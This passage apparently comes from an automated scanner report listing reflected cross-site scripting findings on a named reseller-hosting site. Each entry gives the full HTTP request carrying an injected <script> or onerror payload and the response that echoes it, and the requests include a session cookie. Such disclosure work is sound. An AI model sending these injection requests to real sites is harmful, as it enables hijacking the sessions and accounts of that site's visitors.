X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagfe9a7<script>alert(1)</script>e851b81a620274380/googlepr.php?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4277. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72b26<img%20src%3da%20onerror%3dalert(1)>d591d172de3 was submitted in the REST URL parameter 2. This input was echoed as 72b26<img src=a onerror=alert(1)>d591d172de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.php72b26<img%20src%3da%20onerror%3dalert(1)>d591d172de3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php72b26<img src=a onerror=alert(1)>d591d172de3]</td>
...[SNIP]...

2.4278. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42ee1<img%20src%3da%20onerror%3dalert(1)>55963d360105fb2a8 was submitted in the REST URL parameter 2. This input was echoed as 42ee1<img src=a onerror=alert(1)>55963d360105fb2a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php42ee1<img%20src%3da%20onerror%3dalert(1)>55963d360105fb2a8?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php42ee1<img src=a onerror=alert(1)>55963d360105fb2a8]</td>
...[SNIP]...

2.4279. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9a823</title><img%20src%3da%20onerror%3dalert(1)>3edf543b73565ff68 was submitted in the REST URL parameter 2. This input was echoed as 9a823</title><img src=a onerror=alert(1)>3edf543b73565ff68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php9a823</title><img%20src%3da%20onerror%3dalert(1)>3edf543b73565ff68?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.php9a823</title><img src=a onerror=alert(1)>3edf543b73565ff68</title>
...[SNIP]...

2.4280. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload eef3e</title><img%20src%3da%20onerror%3dalert(1)>5d62d5e64b4 was submitted in the REST URL parameter 2. This input was echoed as eef3e</title><img src=a onerror=alert(1)>5d62d5e64b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.phpeef3e</title><img%20src%3da%20onerror%3dalert(1)>5d62d5e64b4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.phpeef3e</title><img src=a onerror=alert(1)>5d62d5e64b4</title>
...[SNIP]...

2.4281. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b306<img%20src%3da%20onerror%3dalert(1)>a0301be902b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b306<img src=a onerror=alert(1)>a0301be902b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.php/7b306<img%20src%3da%20onerror%3dalert(1)>a0301be902b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php/7b306<img src=a onerror=alert(1)>a0301be902b]</td>
...[SNIP]...

2.4282. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 97d21</title><img%20src%3da%20onerror%3dalert(1)>ed8013cf980 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97d21</title><img src=a onerror=alert(1)>ed8013cf980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.php/97d21</title><img%20src%3da%20onerror%3dalert(1)>ed8013cf980 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.php/97d21</title><img src=a onerror=alert(1)>ed8013cf980</title>
...[SNIP]...

2.4283. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 95c49</title><img%20src%3da%20onerror%3dalert(1)>02217416ad4d15bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95c49</title><img src=a onerror=alert(1)>02217416ad4d15bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php/95c49</title><img%20src%3da%20onerror%3dalert(1)>02217416ad4d15bf6?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.php/95c49</title><img src=a onerror=alert(1)>02217416ad4d15bf6</title>
...[SNIP]...

2.4284. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11efe<img%20src%3da%20onerror%3dalert(1)>21e6cfcd6d5617f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11efe<img src=a onerror=alert(1)>21e6cfcd6d5617f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php/11efe<img%20src%3da%20onerror%3dalert(1)>21e6cfcd6d5617f55?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php/11efe<img src=a onerror=alert(1)>21e6cfcd6d5617f55]</td>
...[SNIP]...

2.4285. http://www.resellerbase.com/tag/host [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4050<script>alert(1)</script>36d4281c3ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc4050<script>alert(1)</script>36d4281c3ef/host HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc4050<script>alert(1)</script>36d4281c3ef/host was not found on this server.</p>
...[SNIP]...

2.4286. http://www.resellerbase.com/tag/host [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adef1<script>alert(1)</script>0d03676561d8d8872 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagadef1<script>alert(1)</script>0d03676561d8d8872/host?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagadef1<script>alert(1)</script>0d03676561d8d8872/host?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4287. http://www.resellerbase.com/tag/host [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5dc5c</title><img%20src%3da%20onerror%3dalert(1)>ae6500625b289c63e was submitted in the REST URL parameter 2. This input was echoed as 5dc5c</title><img src=a onerror=alert(1)>ae6500625b289c63e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/host5dc5c</title><img%20src%3da%20onerror%3dalert(1)>ae6500625b289c63e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host5dc5c</title><img src=a onerror=alert(1)>ae6500625b289c63e</title>
...[SNIP]...

2.4288. http://www.resellerbase.com/tag/host [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 28627</title><img%20src%3da%20onerror%3dalert(1)>698e8cc0a35 was submitted in the REST URL parameter 2. This input was echoed as 28627</title><img src=a onerror=alert(1)>698e8cc0a35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/host28627</title><img%20src%3da%20onerror%3dalert(1)>698e8cc0a35 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host28627</title><img src=a onerror=alert(1)>698e8cc0a35</title>
...[SNIP]...

2.4289. http://www.resellerbase.com/tag/host [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87b1a<img%20src%3da%20onerror%3dalert(1)>df2c67f961a2da4c3 was submitted in the REST URL parameter 2. This input was echoed as 87b1a<img src=a onerror=alert(1)>df2c67f961a2da4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/host87b1a<img%20src%3da%20onerror%3dalert(1)>df2c67f961a2da4c3?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host8
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : host87b1a<img src=a onerror=alert(1)>df2c67f961a2da4c3]</td>
...[SNIP]...

2.4290. http://www.resellerbase.com/tag/host [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23923<img%20src%3da%20onerror%3dalert(1)>ce491d9ef26 was submitted in the REST URL parameter 2. This input was echoed as 23923<img src=a onerror=alert(1)>ce491d9ef26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/host23923<img%20src%3da%20onerror%3dalert(1)>ce491d9ef26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: host2
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : host23923<img src=a onerror=alert(1)>ce491d9ef26]</td>
...[SNIP]...

2.4291. http://www.resellerbase.com/tag/hosting [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e29e1<script>alert(1)</script>7db36f91329300533 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tage29e1<script>alert(1)</script>7db36f91329300533/hosting?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage29e1<script>alert(1)</script>7db36f91329300533/hosting?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4292. http://www.resellerbase.com/tag/hosting [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 941e7<script>alert(1)</script>6ade4f61cd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag941e7<script>alert(1)</script>6ade4f61cd5/hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag941e7<script>alert(1)</script>6ade4f61cd5/hosting was not found on this server.</p>
...[SNIP]...

2.4293. http://www.resellerbase.com/tag/hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 49388</title><img%20src%3da%20onerror%3dalert(1)>cf20de4afe4 was submitted in the REST URL parameter 2. This input was echoed as 49388</title><img src=a onerror=alert(1)>cf20de4afe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hosting49388</title><img%20src%3da%20onerror%3dalert(1)>cf20de4afe4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.4294. http://www.resellerbase.com/tag/hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

